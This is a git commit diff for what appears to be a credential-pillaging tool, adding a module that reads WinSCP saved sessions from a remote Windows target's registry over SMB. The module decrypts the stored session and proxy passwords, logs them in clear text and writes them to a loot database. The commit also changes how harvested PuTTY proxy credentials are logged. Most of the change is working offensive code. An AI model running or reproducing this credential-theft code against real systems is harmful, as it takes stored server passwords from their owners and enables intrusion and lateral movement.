WinSCP support

2024-12-17 20:55:15 +00:00 · 2022-09-26 16:37:07 +02:00 · 2022-09-26 16:37:07 +02:00 · ec3dccd7f0
commit ec3dccd7f0
parent 7fc5322b1f
4 changed files with 179 additions and 5 deletions
--- a/database.py
+++ b/database.py
@ -162,6 +162,7 @@ class reporting:
 				credz_content.append('VNC')
 				credz_content.append('MRemoteNG')
 				credz_content.append('Putty')
+				credz_content.append('Winscp')
 				#credz_content.append('VNC')

 			data = """<table class="statistics"><TR>
--- a/myseatbelt.py
+++ b/myseatbelt.py
@ -1911,8 +1911,13 @@ class MySeatBelt:

 	def GetPutty(self):
 		from software.sysadmin.putty import Putty
-		myNewModule = Putty(self.smb,self.myregops,self.myfileops,self.logging,self.options,self.db)
-		myNewModule.run()
+		myPutty = Putty(self.smb,self.myregops,self.myfileops,self.logging,self.options,self.db)
+		myPutty.run()
+
+	def GetWinscp(self):
+		from software.sysadmin.winscp import Winscp
+		myWinscp = Winscp(self.smb,self.myregops,self.myfileops,self.logging,self.options,self.db)
+		myWinscp.run()

 	def GetNew_Module(self):
 		myNewModule = new_module(self.smb,self.myregops,self.myfileops,self.logging,self.options,self.db,self.users)
@ -1945,6 +1950,7 @@ class MySeatBelt:
 				if self.options.no_sysadmins == False :
 					self.GetMRemoteNG()
 					self.GetPutty()
+					self.GetWinscp()
 					if self.options.no_vnc == False:
 						self.GetVNC()
 				if self.options.no_recent == False:
--- a/software/sysadmin/putty.py
+++ b/software/sysadmin/putty.py
@ -21,6 +21,7 @@ class Putty():
        self.db = db
        self.smb = smb

+
    def putty_from_registry(self):
        pfound = []
        puttys = (
@ -36,8 +37,8 @@ class Putty():
                    ProxyPassword=self.myregops.get_reg_value(reg_session, 'ProxyPassword')[1]
                    HostName=self.myregops.get_reg_value(reg_session, 'HostName')[1]
                    ProxyUsername=self.myregops.get_reg_value(reg_session, 'ProxyUsername')[1]
-                    self.logging.debug(
-                    f"[{self.options.target_ip}] Found Putty Proxy : {ProxyUsername}:{ProxyPassword}@{HostName} ")
+                    self.logging.info(
+                    f"[{self.options.target_ip}] Found Putty Proxy : {bcolors.OKBLUE}{ProxyUsername}:{ProxyPassword}@{HostName}{bcolors.ENDC} ")
                    ############PROCESSING DATA
                    self.db.add_credz(credz_type='Putty',
                                      credz_username=ProxyUsername,
@ -45,7 +46,7 @@ class Putty():
                                      credz_target=HostName,
                                      credz_path='',
                                      pillaged_from_computer_ip=self.options.target_ip,
-                                      pillaged_from_username=self.options.user)
+                                      pillaged_from_username='')
            except Exception:
                self.logging.debug(f'Problems with putty : {putty}')
                continue
--- a/software/sysadmin/winscp.py
+++ b/software/sysadmin/winscp.py
@ -0,0 +1,166 @@
+# Code based on vncpasswd.py by trinitronx
+# https://github.com/trinitronx/vncpasswd.py
+import binascii
+import codecs
+import traceback
+
+from . import d3des as d
+
+from lib.toolbox import bcolors
+
+
+# from https://github.com/dzxs/winscppassword/blob/master/winscppassword.py
+
+
+PWALG_SIMPLE = 1
+PWALG_SIMPLE_MAGIC = 0xA3
+PWALG_SIMPLE_STRING = '0123456789ABCDEF'
+PWALG_SIMPLE_MAXLEN = 50
+PWALG_SIMPLE_FLAG = 0xFF
+PWALG_SIMPLE_INTERNAL = 0x00
+
+
+def simple_encrypt_char(mychar):
+    mychar = ~mychar ^ PWALG_SIMPLE_MAGIC
+    a = (mychar & 0xF0) >> 4
+    b = (mychar & 0x0F) >> 0
+    return PWALG_SIMPLE_STRING[a] + PWALG_SIMPLE_STRING[b]
+
+
+def simple_decrypt_next_char(password_list):
+    if len(password_list) <= 0:
+        return 0x00
+    a = PWALG_SIMPLE_STRING.find(password_list.pop(0))
+    b = PWALG_SIMPLE_STRING.find(password_list.pop(0))
+
+    #print(f'end : {0xff & ~(((a << 4) + b << 0) ^ PWALG_SIMPLE_MAGIC)}')
+    return 0xff & ~(((a << 4) + b << 0) ^ PWALG_SIMPLE_MAGIC)
+
+def encrypt_password(password, key):
+    """
+    encrypt_password('helloworld123', 'root'+'120.24.61.91')
+    """
+    password = key + password
+    if len(password) < PWALG_SIMPLE_MAXLEN:
+        shift = random.randint(0, PWALG_SIMPLE_MAXLEN - len(password))
+    else:
+        shift = 0
+    result = ''
+    result += simple_encrypt_char(PWALG_SIMPLE_FLAG)
+    result += simple_encrypt_char(PWALG_SIMPLE_INTERNAL)
+    result += simple_encrypt_char(len(password))
+    result += simple_encrypt_char(shift)
+    for i in range(shift):
+        result += simple_encrypt_char(random.randint(0, 256))
+    for i in password:
+        result += simple_encrypt_char(ord(i))
+    while len(result) < PWALG_SIMPLE_MAXLEN * 2:
+        result += simple_encrypt_char(random.randint(0, 256))
+    return result
+
+
+def decrypt_password(password, key):
+    """
+    decrypt_password(encrypt_password, 'root'+'120.24.61.91')
+    """
+    if not password or not key:
+        return ''
+    password = list(password)
+    flag = simple_decrypt_next_char(password)
+    if flag == PWALG_SIMPLE_FLAG:
+        _ = simple_decrypt_next_char(password)
+        length = simple_decrypt_next_char(password)
+    else:
+        length = flag
+    password = password[int(simple_decrypt_next_char(password)) * 2:]
+    result = ''
+    for i in range(length):
+        result += chr(simple_decrypt_next_char(password))
+
+    # print result
+    if flag == PWALG_SIMPLE_FLAG:
+        if result[:len(key)] != key:
+            if 'proxy' in result:
+                result=result[result.index('proxy')-1+len('proxy)'):]
+            else:
+                result = ''
+        else:
+            result = result[len(key):]
+    return result
+
+
+class Winscp():
+    def __init__(self,smb, myregops, myfileops, logger, options, db):
+        self.myregops = myregops
+        self.myfileops = myfileops
+        self.logging = logger
+        self.options = options
+        self.db = db
+        self.smb = smb
+
+    def winscp_from_registry(self):
+        pfound = []
+        puttys = (
+            ('Winscp', 'HKCU\\Software\\Martin Prikryl\\WinSCP 2\\Sessions'),
+            #('WinSCP', 'Software\\Martin Prikryl\\WinSCP 2\\Configuration', 'Security'),
+        )
+
+        for putty in puttys:
+            try:
+                reg_sessions = self.myregops.get_reg_subkey(putty[1])
+                for reg_session in reg_sessions:
+                    try:
+                        self.logging.debug(f'Found Winscp session : {reg_session}')
+                        HostName=self.myregops.get_reg_value(reg_session, 'HostName')[1][:-1]
+                        encPassword = self.myregops.get_reg_value(reg_session, 'Password')[1][:-1]
+                        Username=self.myregops.get_reg_value(reg_session, 'Username')[1][:-1]
+                        try :
+                            PortNumber = self.myregops.get_reg_value(reg_session, 'PortNumber')[1]
+                        except Exception as e:
+                            self.logging.debug(f'except {e}')
+                            PortNumber = ''
+                        Password=decrypt_password(encPassword, Username + HostName)
+                        self.logging.info(f"[{self.options.target_ip}] Found Winscp : {bcolors.OKBLUE}{Username}:{Password}@{HostName}:{PortNumber}{bcolors.ENDC}")
+                        ############PROCESSING DATA
+                        self.db.add_credz(credz_type='Winscp',
+                                          credz_username=Username,
+                                          credz_password=Password,
+                                          credz_target=f"{HostName}:{PortNumber}",
+                                          credz_path='',
+                                          pillaged_from_computer_ip=self.options.target_ip,
+                                          pillaged_from_username='')
+                    except Exception:
+                        self.logging.debug(f'Problems with Winscp : {putty}')
+
+                    ######## If we have proxy data
+                    try:
+                        HostName = self.myregops.get_reg_value(reg_session, 'HostName')[1][:-1]
+                        ProxyUsername = self.myregops.get_reg_value(reg_session, 'ProxyUsername')[1][:-1]
+                        ProxyPasswordEnc = self.myregops.get_reg_value(reg_session, 'ProxyPasswordEnc')[1][:-1]
+                        ProxyPassword = decrypt_password(ProxyPasswordEnc, ProxyUsername + HostName)
+                        self.db.add_credz(credz_type='Winscp',
+                                          credz_username=ProxyUsername,
+                                          credz_password=ProxyPassword,
+                                          credz_target=HostName,
+                                          credz_path='',
+                                          pillaged_from_computer_ip=self.options.target_ip,
+                                          pillaged_from_username='')
+                        self.logging.info(
+                            f"[{self.options.target_ip}] Found Winscp Proxy: {bcolors.OKBLUE}{ProxyUsername}:{ProxyPassword}@{HostName}{bcolors.ENDC}")
+
+                    except Exception as e:
+                        self.logging.debug(f'exception while looking for proxy info {e}')
+
+
+
+            except Exception:
+                self.logging.debug(f'Problems with Winscp : {putty}')
+                continue
+        return pfound
+
+    def WinscpFromFile(self):
+        path = "\\AppData\\Roaming\\winSCP.ini"
+
+
+    def run(self):
+        return self.winscp_from_registry()